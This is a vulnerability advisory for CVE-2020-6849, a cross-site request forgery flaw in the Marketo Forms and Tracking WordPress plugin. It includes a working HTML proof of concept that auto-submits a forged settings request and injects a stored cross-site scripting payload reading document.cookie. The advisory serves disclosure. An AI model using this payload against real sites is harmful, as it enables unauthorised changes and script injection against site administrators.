#VU24385 Cross-site request forgery in Marketo Forms and Tracking - CVE-2020-6849
Published: January 20, 2020
Vulnerability identifier: #VU24385
Vulnerability risk: Low
CVSSv4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/U:Clear
CVE-ID: CVE-2020-6849
CWE-ID: CWE-352
Exploitation vector: Remote access
Exploit availability:
No public exploit available
Vulnerable software:
Marketo Forms and Tracking
Marketo Forms and Tracking
Software vendor:
Hutchhouse
Hutchhouse
Description
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.
PoC:
<html>
<form action="https://[host]/wp-admin/admin.php?page=marketo_fat" method="POST" id="csrf">
<input type="text" name="marketo_save" value="true">
<input type="text" name="marketo[marketo_id]" value=""><script>alert(document.cookie)</script>">
<input type="text" name="marketo[marketo_base_url]" value="">
<input type="text" name="marketo[user_id]" value="">
<input type="text" name="marketo[end_point]" value="">
<input type="text" name="marketo[secret]" value="">
<input type="text" name="marketo[popout_title]" value="">
<input type="text" name="marketo[popout_tabtext]" value="">
<input type="text" name="marketo[popout_snippet]" value="">
<input type="text" name="marketo[popout_form]" value="">
</form>
<script>
document.getElementById('csrf').submit();
</script>
</html>Remediation
Cybersecurity Help is currently unaware of any official solution to address this vulnerability.